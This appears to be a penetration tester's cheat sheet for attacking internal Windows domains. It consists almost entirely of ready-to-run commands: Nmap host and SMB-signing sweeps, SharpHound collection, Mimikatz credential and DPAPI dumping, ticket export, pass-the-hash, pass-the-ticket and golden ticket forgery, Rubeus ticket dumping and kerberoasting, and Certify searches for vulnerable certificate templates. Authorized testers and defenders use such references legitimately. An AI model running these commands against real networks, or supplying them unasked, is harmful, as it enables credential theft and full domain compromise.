Internal (Windows)

Starting with some NMap Scans/Scripts we can find plenty of other information for more targeted attacks and finding other attack paths/vectors. Then depending if we were given user credentials to perform a "compromised user" approach, we can go down other paths, but either way we would want to check for all of these with and without credentials.

We should verify if the machine is domain joined or not as well.

NMap

  • Find Uphosts:

nmap -sn -iL targets.txt -oG - | ForEach-Object { if ($_ -match "Up$") { ($_ -split ' ')[1] } } > up-hosts.txt

  • Scan and output to file:

nmap -p 80 --open -iL targets.txt > 80.txt

  • SMB Signing Not Required:

nmap -p 445 -iL uphosts.txt --script smb2-security-mode.nse > smb-signing-not-required.txt

  • SNMP Info

nmap -Pn -sV -p 161 --script=snmp-info IP

  • Puts saved output into a list of IPs:

Select-String -Path "input.txt" -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | ForEach-Object { $_.Matches.Value } > output.txt

Sharphound

Ingest Files for bloodhound

Sharphound.exe -u USER -p 'PASSWORD' -d DOMAIN -c All

Mimikatz

Enable debug privileges

privilege::debug

sekurlsa

  • Extract credentials from the system's memory

sekurlsa::logonpasswords
sekurlsa::logonPasswords full

  • Dump and export Kerberos tickets from memory

sekurlsa::tickets /export

  • Pass the hash - PTH

sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd

kerberos

  • Dump and export Kerberos tickets from memory associated with active user sessions

kerberos::list /export

  • Pass the ticket - PTT

kerberos::ptt c:\TICKET

  • Create a Golden Ticket

kerberos::golden /admin:DOMAIN-ADMIN /domain:DOMAIN /sid:USER-SID /krbtgt:KRBTGT /ticket:TICKET

TGT

  • Interact with and manipulate Kerberos tickets

kerberos

ekeys

  • Dump encryption keys from the system's memory

sekurlsa::ekeys

DPAPI

  • Extract and decrypt credentials protected by DPAPI (Data Protection API) from memory

sekurlsa::dpapi

Rubeus

Verify we can obtain a valid Kerberos ticket

.\Rubeus.exe asktgt /user:USER /password:PASSWORD

Dump all Kerberos tickets currently in memory for the logged-in user

.\Rubeus.exe dump

Export file tickets to .kirbi file

.\Rubeus.exe dump /export

Requests a service ticket (TGS) for a specific service using an existing TGT.

.\Rubeus.exe asktgs /ticket:BASE-64-TICKET

Request service tickets for SPNs (Service Principal Names) associated with service accounts

.\Rubeus.exe kerberoast
klist

Certify

Find all enabled certificate templates

.\Certify.exe find

Find vulnerable/abusable certificate templates

.\Certify.exe find /vulnerable

Last updated